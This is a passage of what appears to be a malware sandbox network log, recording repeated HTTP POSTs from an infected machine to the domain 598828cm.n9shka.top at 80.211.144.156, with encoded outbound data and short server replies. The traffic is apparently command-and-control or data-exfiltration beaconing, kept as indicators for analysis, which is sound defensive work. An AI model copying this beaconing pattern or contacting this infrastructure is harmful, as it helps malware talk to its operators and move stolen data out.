Sep 14, 2024 12:54:20.144419909 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:20.493769884 CEST	1012	OUT	Data Raw: 56 54 5c 5f 54 45 5a 59 5e 5e 56 51 56 5d 54 52 57 53 5c 54 57 59 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VT\_TEZY^^VQV]TRWS\TWYU_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&(,-$>T6$ X)-%5<?'\1:3[<_ '9"#;&F/%Z-1
Sep 14, 2024 12:54:20.905046940 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:20.956338882 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:20 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
81	192.168.2.4	62847	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:21.094047070 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:21.446917057 CEST	1012	OUT	Data Raw: 53 53 59 59 51 45 5f 5f 5e 5e 56 51 56 5a 54 53 57 5e 5c 54 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SSYYQE__^^VQVZTSW^\TWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?5^$.S!4(.!"<'01\#Y+'Q'46.<&F/%Z--
Sep 14, 2024 12:54:21.779870033 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:21.916532040 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
82	192.168.2.4	62848	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:22.048103094 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:22.402472019 CEST	1012	OUT	Data Raw: 56 5f 59 59 54 45 5f 58 5e 5e 56 51 56 5c 54 5c 57 50 5c 55 57 5c 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V_YYTE_X^^VQV\T\WP\UW\U^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?6'X.W!'[-=#?4Z$+ '+()19"#39/&F/%Z-
Sep 14, 2024 12:54:22.719101906 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:22.946315050 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:22 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
83	192.168.2.4	62849	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:23.074006081 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:23.431371927 CEST	1012	OUT	Data Raw: 56 57 59 55 54 44 5a 5b 5e 5e 56 51 56 5f 54 53 57 57 5c 55 57 5a 55 58 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VWYUTDZ[^^VQV_TSWW\UWZUXQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\,"':T#$$-#/03;(&( 2*&7[8&F/%Z-9
Sep 14, 2024 12:54:23.827820063 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:23.869651079 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:23 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
84	192.168.2.4	62850	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:23.953223944 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port
85	192.168.2.4	62851	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:23.999856949 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:24.353168964 CEST	1012	OUT	Data Raw: 56 54 59 5d 54 43 5a 5f 5e 5e 56 51 56 5c 54 59 57 56 5c 5f 57 5d 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VTY]TCZ_^^VQV\TYWV\_W]UVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%Y+?5[&-%5*=6?0$(2:'X<_/Q':>739[,,&F/%Z-
Sep 14, 2024 12:54:24.675563097 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:24.806042910 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:24 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
86	192.168.2.4	62852	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:24.937675953 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:25.290755987 CEST	1012	OUT	Data Raw: 56 5e 59 5e 51 41 5a 5c 5e 5e 56 51 56 59 54 5f 57 5e 5c 5d 57 5b 55 5e 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V^Y^QAZ\^^VQVYT_W^\]W[U^QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+9_'.>S!$4Y>5"0$+?'*'<:7&\)]#0=X,&F/%Z-!
Sep 14, 2024 12:54:25.612818956 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:25.812776089 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:25 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
87	192.168.2.4	62853	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:25.940253019 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:26.290714025 CEST	1012	OUT	Data Raw: 56 51 5c 5b 54 45 5f 5c 5e 5e 56 51 56 5e 54 5d 57 52 5c 58 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VQ\[TE_\^^VQV^T]WR\XWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<<:3.>"4$]=6!Y8'+'%)7^?)+14#),,&F/%Z-=
Sep 14, 2024 12:54:26.603148937 CEST	1012	OUT	Data Raw: 56 51 5c 5b 54 45 5f 5c 5e 5e 56 51 56 5e 54 5d 57 52 5c 58 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VQ\[TE_\^^VQV^T]WR\XWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<<:3.>"4$]=6!Y8'+'%)7^?)+14#),,&F/%Z-=
Sep 14, 2024 12:54:27.032875061 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:27.033087015 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:27.306291103 CEST	1012	OUT	Data Raw: 56 51 5c 5b 54 45 5f 5c 5e 5e 56 51 56 5e 54 5d 57 52 5c 58 57 59 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VQ\[TE_\^^VQV^T]WR\XWYU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<<:3.>"4$]=6!Y8'+'%)7^?)+14#),,&F/%Z-=
Sep 14, 2024 12:54:28.073745966 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:28.073775053 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:28.355649948 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.4	62854	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:28.490564108 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:28.837563038 CEST	1012	OUT	Data Raw: 56 53 5c 59 51 41 5a 5f 5e 5e 56 51 56 5f 54 59 57 52 5c 5a 57 5f 55 5a 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VS\YQAZ_^^VQV_TYWR\ZW_UZQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%?)Z'*"4<]>2\5]$(]190<:3%\5X U";<&F/%Z-9

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.4	62855	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:29.017883062 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1748 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:29.369018078 CEST	1748	OUT	Data Raw: 56 52 59 5d 54 45 5f 58 5e 5e 56 51 56 5e 54 5a 57 50 5c 55 57 5d 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VRY]TE_X^^VQV^TZWP\UW]U]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%\?,-X'&57=."^"<;%((X19?+3'*#32,&F/%Z-=
Sep 14, 2024 12:54:29.681368113 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:29.808490038 CEST	308	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 152 Connection: keep-alive Data Raw: 00 1f 23 1a 28 34 23 01 20 3a 2b 08 3c 3f 35 06 29 1c 3e 5f 2a 3c 0a 02 28 37 21 5c 2b 2d 20 08 24 2c 30 5a 30 31 26 06 27 27 27 1a 21 2b 2e 5a 0c 1d 23 5a 20 30 36 10 24 28 3e 12 24 0f 32 1a 20 54 24 01 32 05 21 59 21 01 3d 02 3c 16 2a 0f 3e 31 25 10 29 5b 3a 44 38 3d 36 51 34 02 23 51 00 10 26 55 24 2d 26 04 21 19 3a 0c 3d 0f 3e 05 24 25 31 09 27 05 35 01 24 38 3e 05 30 23 3c 03 20 22 3f 12 27 2c 23 1a 34 1d 0c 0b 29 2e 23 52 2b 0d 28 57 02 3e 5c 4d Data Ascii: #(4# :+<?5)>_<(7!\+- $,0Z01&'''!+.Z#Z 06$(>$2 T$2!Y!=<>1%)[:D8=6Q4#Q&U$-&!:=>$%1'5$8>0#< "?',#4).#R+(W>\M

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.4	62856	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:29.158464909 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:29.509507895 CEST	1012	OUT	Data Raw: 56 5f 59 5c 51 46 5a 5d 5e 5e 56 51 56 53 54 5b 57 57 5c 5a 57 50 55 59 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: V_Y\QFZ]^^VQVST[WW\ZWPUYQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%(=$"W"'3>>56?$'<%Z+?%*"#9[;&F/%Z-
Sep 14, 2024 12:54:29.831511974 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:29.962171078 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:29 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.4	62857	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:30.127327919 CEST	266	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue
Sep 14, 2024 12:54:30.478286028 CEST	1012	OUT	Data Raw: 53 52 5c 5c 51 44 5a 5e 5e 5e 56 51 56 52 54 59 57 5e 5c 5e 57 59 55 56 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SR\\QDZ^^^VQVRTYW^\^WYUVQAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z%X?/&3=!Z>57$(%\#(+&:&4#,<&F/%Z-
Sep 14, 2024 12:54:30.800896883 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:30.930233002 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:30 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.4	62858	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:31.059005022 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1008 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:31.415654898 CEST	1008	OUT	Data Raw: 56 51 59 54 54 43 5a 5a 5e 5e 56 51 56 5b 54 5f 57 50 5c 5b 57 58 55 5d 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: VQYTTCZZ^^VQV[T_WP\[WXU]QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&+,Z&.&U"Q;)#?+3,_%?( 2):7U>;&F/%Z-9
Sep 14, 2024 12:54:31.730587959 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:31.860414982 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:31 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.4	62859	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:32.001293898 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:32.353195906 CEST	1012	OUT	Data Raw: 53 52 59 55 54 40 5f 59 5e 5e 56 51 56 5f 54 5e 57 53 5c 5e 57 51 55 5c 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SRYUT@_Y^^VQV_T^WS\^WQU\QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&?=3>T"8>=53'(''3[+'')]!3";&F/%Z-9
Sep 14, 2024 12:54:32.686450958 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:32.881419897 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.4	62860	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:33.013256073 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1012 Expect: 100-continue Connection: Keep-Alive
Sep 14, 2024 12:54:33.368829966 CEST	1012	OUT	Data Raw: 53 55 59 58 54 41 5a 5d 5e 5e 56 51 56 5f 54 5f 57 54 5c 5a 57 5c 55 5f 51 41 43 5c 52 58 55 56 5a 5d 52 56 5a 50 57 5a 5c 52 55 56 5a 59 51 5d 5a 51 59 5d 5d 52 50 51 5d 5d 51 5a 5c 54 51 5e 5b 57 41 58 5b 5a 5e 5b 5f 5e 58 59 42 59 43 54 57 50 Data Ascii: SUYXTAZ]^^VQV_T_WT\ZW\U_QAC\RXUVZ]RVZPWZ\RUVZYQ]ZQY]]RPQ]]QZ\TQ^[WAX[Z^[_^XYBYCTWPWSQXXBR]PUXX\QV[\YXRF]\UFWQP_Y]DQWYZQ\]^__YU\\\T\^_[]T^S[ZU\YUQUT[RRZCBFBR_^SWDPT__\RVZ[UZZ\^P[[[Z[\_Z&<6$=&V"'?)[)"?(Z'^(]297_?9?%9" !Z8&F/%Z-9
Sep 14, 2024 12:54:33.706499100 CEST	25	IN	HTTP/1.1 100 Continue
Sep 14, 2024 12:54:33.842020035 CEST	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Sep 2024 10:54:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 4 Connection: keep-alive Data Raw: 32 57 5a 50 Data Ascii: 2WZP

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.4	62862	80.211.144.156	80

Timestamp	Bytes transferred	Direction	Data
Sep 14, 2024 12:54:34.936907053 CEST	290	OUT	POST /VmPollSecureLongpollApiBasewindowsUniversal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 598828cm.n9shka.top Content-Length: 1724 Expect: 100-continue Connection: Keep-Alive
